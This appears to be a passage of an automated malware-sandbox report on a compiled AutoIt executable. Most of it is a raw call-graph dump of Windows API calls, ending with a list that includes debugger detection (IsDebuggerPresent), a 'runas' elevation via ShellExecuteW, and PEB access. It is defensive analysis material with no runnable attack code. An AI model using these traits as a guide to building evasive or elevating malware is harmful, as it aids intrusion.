fe8ff6 __close 9 API calls 99919->99920 99920->99916 99921->99823 99922->99866 99923->99832 99924->99830 99925->99832 99926->99841 99927->99850 99928->99866 99929->99843 99930->99868 99931->99878 99932->99868 99933->99882 99934->99885 99935->99862 99936->99868 99937->99827 99938->99830 99939->99866 99941 ff0fa3 __close 99940->99941 99942 ff0fc7 99941->99942 99943 ff0fb0 99941->99943 99945 ff108b 99942->99945 99948 ff0fdb 99942->99948 99944 fe8d34 __close 58 API calls 99943->99944 99947 ff0fb5 99944->99947 99946 fe8d34 __close 58 API calls 99945->99946 99949 ff0ffe 99946->99949 99950 fe8d68 __close 58 API calls 99947->99950 99951 ff0ff9 99948->99951 99952 ff1006 99948->99952 99958 fe8d68 __close 58 API calls 99949->99958 99965 ff0fbc __close 99950->99965 99953 fe8d34 __close 58 API calls 99951->99953 99954 ff1028 99952->99954 99955 ff1013 99952->99955 99953->99949 99957 fed446 ___lock_fhandle 59 API calls 99954->99957 99956 fe8d34 __close 58 API calls 99955->99956 99959 ff1018 99956->99959 99960 ff102e 99957->99960 99961 ff1020 99958->99961 99962 fe8d68 __close 58 API calls 99959->99962 99963 ff1054 99960->99963 99964 ff1041 99960->99964 99967 fe8ff6 __close 9 API calls 99961->99967 99962->99961 99968 fe8d68 __close 58 API calls 99963->99968 99966 ff10ab __read_nolock 70 API calls 99964->99966 99965->99898 99969 ff104d 99966->99969 99967->99965 99970 ff1059 99968->99970 99972 ff1083 __read LeaveCriticalSection 99969->99972 99971 fe8d34 __close 58 API calls 99970->99971 99971->99969 99972->99965 99973->99889 99974->99890 99975->99893 99977 fe5e9c __close 99976->99977 99978 fe5eae 99977->99978 99979 fe5ec3 99977->99979 99990 fe8d68 58 API calls __getptd_noexit 99978->99990 99980 fe6e4e __lock_file 59 API calls 99979->99980 99982 fe5ec9 99980->99982 99992 fe5b00 67 API calls 5 library calls 99982->99992 99983 fe5eb3 99991 fe8ff6 9 API calls __close 99983->99991 99986 fe5ed4 99993 fe5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99986->99993 99988 fe5ee6 99989 fe5ebe __close 99988->99989 99989->99576 99990->99983 99991->99989 99992->99986 99993->99988 99994->99462 99995->99476 99996->99478 99997->99475 99998->99488 99999->99485 100000->99493 100001->99511 100003 1028da9 100002->100003 100004 1028d9b 100002->100004 100006 1028dee 100003->100006 100007 fe548b 115 API calls 100003->100007 100018 1028db2 100003->100018 100005 fe548b 115 API calls 100004->100005 100005->100003 100033 102901b 100006->100033 100008 1028dd3 100007->100008 100008->100006 100011 1028ddc 100008->100011 100010 1028e32 100012 1028e36 100010->100012 100013 1028e57 100010->100013 100015 fe55d6 __fcloseall 83 API calls 100011->100015 100011->100018 100014 1028e43 100012->100014 100017 fe55d6 __fcloseall 83 API calls 100012->100017 100037 1028c33 100013->100037 100014->100018 100020 fe55d6 __fcloseall 83 API calls 100014->100020 100015->100018 100017->100014 100018->99523 100020->100018 100021 1028e85 100046 1028eb5 100021->100046 100022 1028e65 100025 fe55d6 __fcloseall 83 API calls 100022->100025 100026 1028e72 100022->100026 100025->100026 100026->100018 100027 fe55d6 __fcloseall 83 API calls 100026->100027 100027->100018 100030 1028ea0 100030->100018 100032 fe55d6 __fcloseall 83 API calls 100030->100032 100032->100018 100034 1029040 100033->100034 100035 1029029 __tzset_nolock _memmove 100033->100035 100036 fe5812 __fread_nolock 74 API calls 100034->100036 100035->100010 100036->100035 100038 fe594c __crtGetStringTypeA_stat 58 API calls 100037->100038 100039 1028c42 100038->100039 100040 fe594c __crtGetStringTypeA_stat 58 API calls 100039->100040 100041 1028c56 100040->100041 100042 fe594c __crtGetStringTypeA_stat 58 API calls 100041->100042 100043 1028c6a 100042->100043 100044 1028f97 58 API calls 100043->100044 100045 1028c7d 100043->100045 100044->100045 100045->100021 100045->100022 100047 1028eca 100046->100047 100048 1028f82 100047->100048 100050 1028e8c 100047->100050 100051 1028c8f 74 API calls 100047->100051 100079 1028d2b 74 API calls 100047->100079 100080 102909c 80 API calls 100047->100080 100075 10291bf 100048->100075 100054 1028f97 100050->100054 100051->100047 100055 1028fa4 100054->100055 100056 1028faa 100054->100056 100057 fe2f95 _free 58 API calls 100055->100057 100058 1028fbb 100056->100058 100059 fe2f95 _free 58 API calls 100056->100059 100057->100056 100060 1028e93 100058->100060 100061 fe2f95 _free 58 API calls 100058->100061 100059->100058 100060->100030 100062 fe55d6 100060->100062 100061->100060 100063 fe55e2 __close 100062->100063 100064 fe560e 100063->100064 100065 fe55f6 100063->100065 100068 fe6e4e __lock_file 59 API calls 100064->100068 100071 fe5606 __close 100064->100071 100162 fe8d68 58 API calls __getptd_noexit 100065->100162 100067 fe55fb 100163 fe8ff6 9 API calls __close 100067->100163 100070 fe5620 100068->100070 100146 fe556a 100070->100146 100071->100030 100076 10291dd 100075->100076 100077 10291cc 100075->100077 100076->100050 100081 fe4a93 100077->100081 100079->100047 100080->100047 100082 fe4a9f __close 100081->100082 100083 fe4abd 100082->100083 100084 fe4ad5 100082->100084 100086 fe4acd __close 100082->100086 100106 fe8d68 58 API calls __getptd_noexit 100083->100106 100087 fe6e4e __lock_file 59 API calls 100084->100087 100086->100076 100089 fe4adb 100087->100089 100088 fe4ac2 100107 fe8ff6 9 API calls __close 100088->100107 100094 fe493a 100089->100094 100097 fe4949 100094->100097 100100 fe4967 100094->100100 100095 fe4957 100137 fe8d68 58 API calls __getptd_noexit 100095->100137 100097->100095 100097->100100 100103 fe4981 _memmove 100097->100103 100098 fe495c 100138 fe8ff6 9 API calls __close 100098->100138 100108 fe4b0d LeaveCriticalSection LeaveCriticalSection _fseek 100100->100108 100103->100100 100104 fe4916 _fprintf 58 API calls 100103->100104 100109 fedac6 100103->100109 100139 fe4c6d 100103->100139 100145 feb05e 78 API calls 7 library calls 100103->100145 100104->100103 100106->100088 100107->100086 100108->100086 100110 fedad2 __close 100109->100110 100111 fedadf 100110->100111 100112 fedaf6 100110->100112 100114 fe8d34 __close 58 API calls 100111->100114 100113 fedb95 100112->100113 100116 fedb0a 100112->100116 100117 fe8d34 __close 58 API calls 100113->100117 100115 fedae4 100114->100115 100118 fe8d68 __close 58 API calls 100115->100118 100119 fedb28 100116->100119 100120 fedb32 100116->100120 100121 fedb2d 100117->100121 100129 fedaeb __close 100118->100129 100122 fe8d34 __close 58 API calls 100119->100122 100123 fed446 ___lock_fhandle 59 API calls 100120->100123 100125 fe8d68 __close 58 API calls 100121->100125 100122->100121 100124 fedb38 100123->100124 100126 fedb5e 100124->100126 100127 fedb4b 100124->100127 100128 fedba1 100125->100128 100130 fe8d68 __close 58 API calls 100126->100130 100131 fedbb5 __write_nolock 76 API calls 100127->100131 100132 fe8ff6 __close 9 API calls 100128->100132 100129->100103 100133 fedb63 100130->100133 100134 fedb57 100131->100134 100132->100129 100135 fe8d34 __close 58 API calls 100133->100135 100136 fedb8d __write LeaveCriticalSection 100134->100136 100135->100134 100136->100129 100137->100098 100138->100100 100140 fe4c80 100139->100140 100144 fe4ca4 100139->100144 100141 fe4916 _fprintf 58 API calls 100140->100141 100140->100144 100142 fe4c9d 100141->100142 100143 fedac6 __write 78 API calls 100142->100143 100143->100144 100144->100103 100145->100103 100147 fe558d 100146->100147 100148 fe5579 100146->100148 100150 fe4c6d __flush 78 API calls 100147->100150 100155 fe5589 100147->100155 100195 fe8d68 58 API calls __getptd_noexit 100148->100195 100152 fe5599 100150->100152 100151 fe557e 100196 fe8ff6 9 API calls __close 100151->100196 100165 ff0dc7 100152->100165 100164 fe5645 LeaveCriticalSection LeaveCriticalSection _fseek 100155->100164 100157 fe4916 _fprintf 58 API calls 100158 fe55a7 100157->100158 100169 ff0c52 100158->100169 100160 fe55ad 100160->100155 100161 fe2f95 _free 58 API calls 100160->100161 100161->100155 100162->100067 100163->100071 100164->100071 100166 fe55a1 100165->100166 100167 ff0dd4 100165->100167 100166->100157 100167->100166 100168 fe2f95 _free 58 API calls 100167->100168 100168->100166 100170 ff0c5e __close 100169->100170 100171 ff0c6b 100170->100171 100172 ff0c82 100170->100172 100221 fe8d34 58 API calls __getptd_noexit 100171->100221 100174 ff0d0d 100172->100174 100175 ff0c92 100172->100175 100226 fe8d34 58 API calls __getptd_noexit 100174->100226 100178 ff0cba 100175->100178 100179 ff0cb0 100175->100179 100177 ff0c70 100222 fe8d68 58 API calls __getptd_noexit 100177->100222 100197 fed446 100178->100197 100223 fe8d34 58 API calls __getptd_noexit 100179->100223 100180 ff0cb5 100227 fe8d68 58 API calls __getptd_noexit 100180->100227 100185 ff0cc0 100187 ff0cde 100185->100187 100188 ff0cd3 100185->100188 100186 ff0d19 100228 fe8ff6 9 API calls __close 100186->100228 100224 fe8d68 58 API calls __getptd_noexit 100187->100224 100206 ff0d2d 100188->100206 100191 ff0c77 __close 100191->100160 100193 ff0cd9 100225 ff0d05 LeaveCriticalSection __unlock_fhandle 100193->100225 100195->100151 100196->100155 100198 fed452 __close 100197->100198 100199 fed4a1 EnterCriticalSection 100198->100199 100200 fe9e4b __lock 58 API calls 100198->100200 100201 fed4c7 __close 100199->100201 100202 fed477 100200->100202 100201->100185 100203 fed48f 100202->100203 100229 fea06b InitializeCriticalSectionAndSpinCount 100202->100229 100230 fed4cb LeaveCriticalSection _doexit 100203->100230 100231 fed703 100206->100231 100208 ff0d91 100244 fed67d 59 API calls __close 100208->100244 100209 ff0d3b 100209->100208 100212 fed703 __lseek_nolock 58 API calls 100209->100212 100220 ff0d6f 100209->100220 100211 ff0d99 100217 ff0dbb 100211->100217 100245 fe8d47 58 API calls 2 library calls 100211->100245 100214 ff0d66 100212->100214 100213 fed703 __lseek_nolock 58 API calls 100215 ff0d7b FindCloseChangeNotification 100213->100215 100218 fed703 __lseek_nolock 58 API calls 100214->100218 100215->100208 100219 ff0d87 GetLastError 100215->100219 100217->100193 100218->100220 100219->100208 100220->100208 100220->100213 100221->100177 100222->100191 100223->100180 100224->100193 100225->100191 100226->100180 100227->100186 100228->100191 100229->100203 100230->100199 100232 fed70e 100231->100232 100233 fed723 100231->100233 100234 fe8d34 __close 58 API calls 100232->100234 100235 fe8d34 __close 58 API calls 100233->100235 100238 fed748 100233->100238 100236 fed713 100234->100236 100239 fed752 100235->100239 100237 fe8d68 __close 58 API calls 100236->100237 100240 fed71b 100237->100240 100238->100209 100241 fe8d68 __close 58 API calls 100239->100241 100240->100209 100242 fed75a 100241->100242 100243 fe8ff6 __close 9 API calls 100242->100243 100243->100240 100244->100211 100245->100217 100247 fe09e2 __ftell_nolock 100246->100247 100248 fe09f1 GetLongPathNameW 100247->100248 100249 fc7d2c 59 API calls 100248->100249 100250 fc741d 100249->100250 100251 fc716b 100250->100251 100252 fc77c7 59 API calls 100251->100252 100253 fc717d 100252->100253 100254 fc48ae 60 API calls 100253->100254 100255 fc7188 100254->100255 100256 ffecae 100255->100256 100257 fc7193 100255->100257 100261 ffecc8 100256->100261 100304 fc7a68 61 API calls 100256->100304 100259 fc3f84 59 API calls 100257->100259 100260 fc719f 100259->100260 100298 fc34c2 100260->100298 100263 fc71b2 Mailbox 100263->99301 100265 fc4f3d 136 API calls 100264->100265 100266 fc69ef 100265->100266 100267 ffe45a 100266->100267 100269 fc4f3d 136 API calls 100266->100269 100268 10297e5 122 API calls 100267->100268 100270 ffe46f 100268->100270 100271 fc6a03 100269->100271 100272 ffe473 100270->100272 100273 ffe490 100270->100273 100271->100267 100274 fc6a0b 100271->100274 100275 fc4faa 84 API calls 100272->100275 100276 fe0ff6 Mailbox 59 API calls 100273->100276 100277 ffe47b 100274->100277 100278 fc6a17 100274->100278 100275->100277 100297 ffe4d5 Mailbox 100276->100297 100398 1024534 90 API calls _wprintf 100277->100398 100305 fc6bec 100278->100305 100282 ffe489 100282->100273 100283 ffe689 100284 fe2f95 _free 58 API calls 100283->100284 100285 ffe691 100284->100285 100286 fc4faa 84 API calls 100285->100286 100291 ffe69a 100286->100291 100290 fe2f95 _free 58 API calls 100290->100291 100291->100290 100292 fc4faa 84 API calls 100291->100292 100404 101fcb1 89 API calls 4 library calls 100291->100404 100292->100291 100294 fc7f41 59 API calls 100294->100297 100297->100283 100297->100291 100297->100294 100399 101fc4d 59 API calls 2 library calls 100297->100399 100400 101fb6e 61 API calls 2 library calls 100297->100400 100401 1027621 59 API calls Mailbox 100297->100401 100402 fc766f 59 API calls 2 library calls 100297->100402 100403 fc74bd 59 API calls Mailbox 100297->100403 100299 fc34d4 100298->100299 100303 fc34f3 _memmove 100298->100303 100301 fe0ff6 Mailbox 59 API calls 100299->100301 100300 fe0ff6 Mailbox 59 API calls 100302 fc350a 100300->100302 100301->100303 100302->100263 100303->100300 100304->100256 100306 ffe847 100305->100306 100307 fc6c15 100305->100307 100420 101fcb1 89 API calls 4 library calls 100306->100420 100410 fc5906 60 API calls Mailbox 100307->100410 100310 ffe85a 100421 101fcb1 89 API calls 4 library calls 100310->100421 100311 fc6c37 100312 fc5956 67 API calls 100311->100312 100313 fc6c4c 100312->100313 100313->100310 100314 fc6c54 100313->100314 100316 fc77c7 59 API calls 100314->100316 100318 fc6c60 100316->100318 100317 ffe876 100320 fc6cc1 100317->100320 100411 fe0b9b 60 API calls __ftell_nolock 100318->100411 100322 fc6ccf 100320->100322 100323 ffe889 100320->100323 100321 fc6c6c 100324 fc77c7 59 API calls 100321->100324 100326 fc77c7 59 API calls 100322->100326 100325 fc5dcf CloseHandle 100323->100325 100327 fc6c78 100324->100327 100328 ffe895 100325->100328 100329 fc6cd8 100326->100329 100331 fc48ae 60 API calls 100327->100331 100332 fc4f3d 136 API calls 100328->100332 100330 fc77c7 59 API calls 100329->100330 100333 fc6ce1 100330->100333 100334 fc6c86 100331->100334 100335 ffe8b1 100332->100335 100336 fc46f9 59 API calls 100333->100336 100338 ffe8da 100335->100338 100339 10297e5 122 API calls 100335->100339 100340 fc6cf8 100336->100340 100422 101fcb1 89 API calls 4 library calls 100338->100422 100343 ffe8cd 100339->100343 100344 fc7c8e 59 API calls 100340->100344 100347 ffe8f6 100343->100347 100348 ffe8d5 100343->100348 100345 ffe8f1 100376 fc6e6c Mailbox 100345->100376 100398->100282 100399->100297 100400->100297 100401->100297 100402->100297 100403->100297 100404->100291 100410->100311 100411->100321 100420->100310 100421->100317 100422->100345 100847 100220e GetTempPathW 100848 100222b 100847->100848 100849 fc3633 100850 fc366a 100849->100850 100851 fc3688 100850->100851 100852 fc36e7 100850->100852 100889 fc36e5 100850->100889 100853 fc375d PostQuitMessage 100851->100853 100854 fc3695 100851->100854 100856 fc36ed 100852->100856 100857 ffd31c 100852->100857 100861 fc36d8 100853->100861 100858 ffd38f 100854->100858 100859 fc36a0 100854->100859 100855 fc36ca DefWindowProcW 100855->100861 100862 fc3715 SetTimer RegisterWindowMessageW 100856->100862 100863 fc36f2 100856->100863 100899 fd11d0 10 API calls Mailbox 100857->100899 100903 1022a16 71 API calls _memset 100858->100903 100864 fc36a8 100859->100864 100865 fc3767 100859->100865 100862->100861 100866 fc373e CreatePopupMenu 100862->100866 100869 ffd2bf 100863->100869 100870 fc36f9 KillTimer 100863->100870 100871 ffd374 100864->100871 100872 fc36b3 100864->100872 100897 fc4531 64 API calls _memset 100865->100897 100866->100861 100868 ffd343 100900 fd11f3 341 API calls Mailbox 100868->100900 100876 ffd2f8 MoveWindow 100869->100876 100877 ffd2c4 100869->100877 100894 fc44cb Shell_NotifyIconW _memset 100870->100894 100871->100855 100902 101817e 59 API calls Mailbox 100871->100902 100879 fc36be 100872->100879 100880 fc374b 100872->100880 100873 ffd3a1 100873->100855 100873->100861 100876->100861 100882 ffd2c8 100877->100882 100883 ffd2e7 SetFocus 100877->100883 100879->100855 100901 fc44cb Shell_NotifyIconW _memset 100879->100901 100896 fc45df 81 API calls _memset 100880->100896 100881 fc375b 100881->100861 100882->100879 100887 ffd2d1 100882->100887 100883->100861 100884 fc370c 100895 fc3114 DeleteObject DestroyWindow Mailbox 100884->100895 100898 fd11d0 10 API calls Mailbox 100887->100898 100889->100855 100892 ffd368 100893 fc43db 68 API calls 100892->100893 100893->100889 100894->100884 100895->100861 100896->100881 100897->100881 100898->100861 100899->100868 100900->100879 100901->100892 100902->100889 100903->100873 100904 fcb56e 100911 fdfb84 100904->100911 100906 fcb584 100920 fcc707 100906->100920 100908 fcb5ac 100909 fca4e8 100908->100909 100932 102a0b5 89 API calls 4 library calls 100908->100932 100912 fdfb90 100911->100912 100913 fdfba2 100911->100913 100933 fc9e9c 60 API calls Mailbox 100912->100933 100915 fdfba8 100913->100915 100916 fdfbd1 100913->100916 100918 fe0ff6 Mailbox 59 API calls 100915->100918 100934 fc9e9c 60 API calls Mailbox 100916->100934 100919 fdfb9a 100918->100919 100919->100906 100921 fc7b76 59 API calls 100920->100921 100922 fcc72c _wcscmp 100920->100922 100921->100922 100923 fc7f41 59 API calls 100922->100923 100926 fcc760 Mailbox 100922->100926 100924 1001abb 100923->100924 100925 fc7c8e 59 API calls 100924->100925 100927 1001ac6 100925->100927 100926->100908 100935 fc859a 68 API calls 100927->100935 100929 1001ad7 100931 1001adb Mailbox 100929->100931 100936 fc9e9c 60 API calls Mailbox 100929->100936 100931->100908 100932->100909 100933->100919 100934->100919 100935->100929 100936->100931 100937 1e52410 100951 1e50000 100937->100951 100939 1e524e0 100954 1e52300 100939->100954 100957 1e53510 GetPEB 100951->100957 100953 1e5068b 100953->100939 100955 1e52309 Sleep 100954->100955 100956 1e52317 100955->100956 100958 1e5353a 100957->100958 100958->100953 100959 fc568a 100960 fc5c18 59 API calls 100959->100960 100961 fc569c 100960->100961 100962 fc5632 61 API calls 100961->100962 100963 fc56aa 100962->100963 100965 fc56ba Mailbox 100963->100965 100966 fc81c1 MultiByteToWideChar 100963->100966 100967 fc822e 100966->100967 100968 fc81e7 100966->100968 100969 fc7eec 59 API calls 100967->100969 100970 fe0ff6 Mailbox 59 API calls 100968->100970 100973 fc8220 100969->100973 100971 fc81fc MultiByteToWideChar 100970->100971 100974 fc78ad 100971->100974 100973->100965 100975 fc78bc 100974->100975 100976 fc792f 100974->100976 100975->100976 100978 fc78c8 100975->100978 100977 fc7e8c 59 API calls 100976->100977 100983 fc78da _memmove 100977->100983 100979 fc7900 100978->100979 100980 fc78d2 100978->100980 100982 fc8189 59 API calls 100979->100982 100986 fc8087 59 API calls Mailbox 100980->100986 100984 fc790a 100982->100984 100983->100973 100985 fe0ff6 Mailbox 59 API calls 100984->100985 100985->100983 100986->100983 100987 fce70b 100990 fcd260 100987->100990 100989 fce719 100991 fcd27d 100990->100991 101019 fcd4dd 100990->101019 100992 1002b0a 100991->100992 100993 1002abb 100991->100993 101023 fcd2a4 100991->101023 101034 103a6fb 341 API calls __cinit 100992->101034 100996 1002abe 100993->100996 101003 1002ad9 100993->101003 100997 1002aca 100996->100997 100996->101023 101032 103ad0f 341 API calls 100997->101032 100999 fe2f80 __cinit 67 API calls 100999->101023 101001 1002cdf 101001->101001 101002 fcd6ab 101002->100989 101003->101019 101033 103b1b7 341 API calls 3 library calls 101003->101033 101004 fcd594 101026 fc8bb2 68 API calls 101004->101026 101008 fcd5a3 101008->100989 101009 1002c26 101038 103aa66 89 API calls 101009->101038 101013 fc8620 69 API calls 101013->101023 101019->101002 101039 102a0b5 89 API calls 4 library calls 101019->101039 101020 fca000 341 API calls 101020->101023 101021 fc81a7 59 API calls 101021->101023 101023->100999 101023->101002 101023->101004 101023->101009 101023->101013 101023->101019 101023->101020 101023->101021 101024 fc88a0 68 API calls __cinit 101023->101024 101025 fc86a2 68 API calls 101023->101025 101027 fc859a 68 API calls 101023->101027 101028 fcd0dc 341 API calls 101023->101028 101029 fc9f3a 59 API calls Mailbox 101023->101029 101030 fcd060 89 API calls 101023->101030 101031 fccedd 341 API calls 101023->101031 101035 fc8bb2 68 API calls 101023->101035 101036 fc9e9c 60 API calls Mailbox 101023->101036 101037 1016d03 60 API calls 101023->101037 101024->101023 101025->101023 101026->101008 101027->101023 101028->101023 101029->101023 101030->101023 101031->101023 101032->101002 101033->101019 101034->101023 101035->101023 101036->101023 101037->101023 101038->101019 101039->101001 101040 ffff06 101041 ffff10 101040->101041 101081 fcac90 Mailbox _memmove 101040->101081 101139 fc8e34 59 API calls Mailbox 101041->101139 101047 fcb5d5 101051 fc81a7 59 API calls 101047->101051 101049 fe0ff6 59 API calls Mailbox 101068 fca097 Mailbox 101049->101068 101061 fca1b7 101051->101061 101052 100047f 101144 102a0b5 89 API calls 4 library calls 101052->101144 101053 fcb5da 101150 102a0b5 89 API calls 4 library calls 101053->101150 101055 fc77c7 59 API calls 101055->101068 101057 fc7f41 59 API calls 101057->101081 101058 fc81a7 59 API calls 101058->101068 101059 100048e 101060 1017405 59 API calls 101060->101068 101063 10166f4 Mailbox 59 API calls 101063->101061 101064 1000e00 101149 102a0b5 89 API calls 4 library calls 101064->101149 101066 fe2f80 67 API calls __cinit 101066->101068 101067 103bf80 341 API calls 101067->101081 101068->101047 101068->101049 101068->101052 101068->101053 101068->101055 101068->101058 101068->101060 101068->101061 101068->101064 101068->101066 101069 fca6ba 101068->101069 101133 fcca20 341 API calls 2 library calls 101068->101133 101134 fcba60 60 API calls Mailbox 101068->101134 101148 102a0b5 89 API calls 4 library calls 101069->101148 101070 10166f4 Mailbox 59 API calls 101070->101081 101071 fe0ff6 59 API calls Mailbox 101071->101081 101072 fcb416 101138 fcf803 341 API calls 101072->101138 101074 fca000 341 API calls 101074->101081 101075 1000c94 101146 fc9df0 59 API calls Mailbox 101075->101146 101077 1000ca2 101147 102a0b5 89 API calls 4 library calls 101077->101147 101079 1000c86 101079->101061 101079->101063 101080 fcb37c 101136 fc9e9c 60 API calls Mailbox 101080->101136 101081->101057 101081->101061 101081->101067 101081->101068 101081->101070 101081->101071 101081->101072 101081->101074 101081->101075 101081->101077 101081->101080 101086 fcb685 101081->101086 101089 fcade2 Mailbox 101081->101089 101095 103c5f4 101081->101095 101127 1027be0 101081->101127 101140 1017405 59 API calls 101081->101140 101141 103c4a7 85 API calls 2 library calls 101081->101141 101083 fcb38d 101137 fc9e9c 60 API calls Mailbox 101083->101137 101145 102a0b5 89 API calls 4 library calls 101086->101145 101089->101061 101089->101079 101089->101086 101091 102d2e6 101 API calls 101089->101091 101092 103e237 130 API calls 101089->101092 101093 fd2123 95 API calls 101089->101093 101094 103474d 341 API calls 101089->101094 101135 fc9df0 59 API calls Mailbox 101089->101135 101142 fc8e34 59 API calls Mailbox 101089->101142 101143 1017405 59 API calls 101089->101143 101091->101089 101092->101089 101093->101089 101094->101089 101096 fc77c7 59 API calls 101095->101096 101097 103c608 101096->101097 101098 fc77c7 59 API calls 101097->101098 101099 103c610 101098->101099 101100 fc77c7 59 API calls 101099->101100 101101 103c618 101100->101101 101102 fc9997 84 API calls 101101->101102 101114 103c626 101102->101114 101103 fc7d2c 59 API calls 101103->101114 101104 103c83c Mailbox 101104->101081 101105 103c7f6 101110 fc7e0b 59 API calls 101105->101110 101107 fc7a84 59 API calls 101107->101114 101108 103c811 101111 fc7e0b 59 API calls 101108->101111 101109 fc81a7 59 API calls 101109->101114 101112 103c803 101110->101112 101113 103c820 101111->101113 101116 fc7c8e 59 API calls 101112->101116 101118 fc7c8e 59 API calls 101113->101118 101114->101103 101114->101104 101114->101105 101114->101107 101114->101108 101114->101109 101115 fc7faf 59 API calls 101114->101115 101117 103c80f 101114->101117 101119 fc7faf 59 API calls 101114->101119 101124 fc9997 84 API calls 101114->101124 101125 fc7c8e 59 API calls 101114->101125 101126 fc7e0b 59 API calls 101114->101126 101120 103c6bd CharUpperBuffW 101115->101120 101116->101117 101117->101104 101152 fc9b9c 59 API calls Mailbox 101117->101152 101118->101117 101121 103c77d CharUpperBuffW 101119->101121 101151 fc859a 68 API calls 101120->101151 101123 fcc707 69 API calls 101121->101123 101123->101114 101124->101114 101125->101114 101126->101114 101128 1027bec 101127->101128 101129 fe0ff6 Mailbox 59 API calls 101128->101129 101130 1027bfa 101129->101130 101131 1027c08 101130->101131 101132 fc77c7 59 API calls 101130->101132 101131->101081 101132->101131 101133->101068 101134->101068 101135->101089 101136->101083 101137->101072 101138->101086 101139->101081 101140->101081 101141->101081 101142->101089 101143->101089 101144->101059 101145->101079 101146->101079 101147->101079 101148->101061 101149->101053 101150->101061 101151->101114 101152->101104 101153 fc1066 101158 fcf8cf 101153->101158 101155 fc106c 101156 fe2f80 __cinit 67 API calls 101155->101156 101157 fc1076 101156->101157 101159 fcf8f0 101158->101159 101191 fe0143 101159->101191 101163 fcf937 101164 fc77c7 59 API calls 101163->101164 101165 fcf941 101164->101165 101166 fc77c7 59 API calls 101165->101166 101167 fcf94b 101166->101167 101168 fc77c7 59 API calls 101167->101168 101169 fcf955 101168->101169 101170 fc77c7 59 API calls 101169->101170 101171 fcf993 101170->101171 101172 fc77c7 59 API calls 101171->101172 101173 fcfa5e 101172->101173 101201 fd60e7 101173->101201 101177 fcfa90 101178 fc77c7 59 API calls 101177->101178 101179 fcfa9a 101178->101179 101229 fdffde 101179->101229 101181 fcfae1 101182 fcfaf1 GetStdHandle 101181->101182 101183 fcfb3d 101182->101183 101184 10049d5 101182->101184 101185 fcfb45 OleInitialize 101183->101185 101184->101183 101186 10049de 101184->101186 101185->101155 101236 1026dda 64 API calls Mailbox 101186->101236 101188 10049e5 101237 10274a9 CreateThread 101188->101237 101190 10049f1 CloseHandle 101190->101185 101238 fe021c 101191->101238 101194 fe021c 59 API calls 101195 fe0185 101194->101195 101196 fc77c7 59 API calls 101195->101196 101197 fe0191 101196->101197 101198 fc7d2c 59 API calls 101197->101198 101199 fcf8f6 101198->101199 101200 fe03a2 6 API calls 101199->101200 101200->101163 101202 fc77c7 59 API calls 101201->101202 101203 fd60f7 101202->101203 101204 fc77c7 59 API calls 101203->101204 101205 fd60ff 101204->101205 101245 fd5bfd 101205->101245 101208 fd5bfd 59 API calls 101209 fd610f 101208->101209 101210 fc77c7 59 API calls 101209->101210 101211 fd611a 101210->101211 101212 fe0ff6 Mailbox 59 API calls 101211->101212 101213 fcfa68 101212->101213 101214 fd6259 101213->101214 101215 fd6267 101214->101215 101216 fc77c7 59 API calls 101215->101216 101217 fd6272 101216->101217 101218 fc77c7 59 API calls 101217->101218 101219 fd627d 101218->101219 101220 fc77c7 59 API calls 101219->101220 101221 fd6288 101220->101221 101222 fc77c7 59 API calls 101221->101222 101223 fd6293 101222->101223 101224 fd5bfd 59 API calls 101223->101224 101225 fd629e 101224->101225 101226 fe0ff6 Mailbox 59 API calls 101225->101226 101227 fd62a5 RegisterWindowMessageW 101226->101227 101227->101177 101230 1015cc3 101229->101230 101231 fdffee 101229->101231 101248 1029d71 60 API calls 101230->101248 101232 fe0ff6 Mailbox 59 API calls 101231->101232 101235 fdfff6 101232->101235 101234 1015cce 101235->101181 101236->101188 101237->101190 101249 102748f 65 API calls 101237->101249 101239 fc77c7 59 API calls 101238->101239 101240 fe0227 101239->101240 101241 fc77c7 59 API calls 101240->101241 101242 fe022f 101241->101242 101243 fc77c7 59 API calls 101242->101243 101244 fe017b 101243->101244 101244->101194 101246 fc77c7 59 API calls 101245->101246 101247 fd5c05 101246->101247 101247->101208 101248->101234

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FC3B7A
                              • IsDebuggerPresent.KERNEL32 ref: 00FC3B8C
                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,010862F8,010862E0,?,?), ref: 00FC3BFD
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                                • Part of subcall function 00FD0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FC3C26,010862F8,?,?,?), ref: 00FD0ACE
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC3C81
                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010793F0,00000010), ref: 00FFD4BC
                              • SetCurrentDirectoryW.KERNEL32(?,010862F8,?,?,?), ref: 00FFD4F4
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01075D40,010862F8,?,?,?), ref: 00FFD57A
                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FFD581
                                • Part of subcall function 00FC3A58: GetSysColorBrush.USER32(0000000F), ref: 00FC3A62
                                • Part of subcall function 00FC3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00FC3A71
                                • Part of subcall function 00FC3A58: LoadIconW.USER32(00000063), ref: 00FC3A88
                                • Part of subcall function 00FC3A58: LoadIconW.USER32(000000A4), ref: 00FC3A9A
                                • Part of subcall function 00FC3A58: LoadIconW.USER32(000000A2), ref: 00FC3AAC
                                • Part of subcall function 00FC3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FC3AD2
                                • Part of subcall function 00FC3A58: RegisterClassExW.USER32(?), ref: 00FC3B28
                                • Part of subcall function 00FC39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FC3A15
                                • Part of subcall function 00FC39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FC3A36
                                • Part of subcall function 00FC39E7: ShowWindow.USER32(00000000,?,?), ref: 00FC3A4A
                                • Part of subcall function 00FC39E7: ShowWindow.USER32(00000000,?,?), ref: 00FC3A53
                                • Part of subcall function 00FC43DB: _memset.LIBCMT ref: 00FC4401
                                • Part of subcall function 00FC43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FC44A6
                              Strings
                              • runas, xrefs: 00FFD575
                              • This is a third-party compiled AutoIt script., xrefs: 00FFD4B4
                              Memory Dump Source
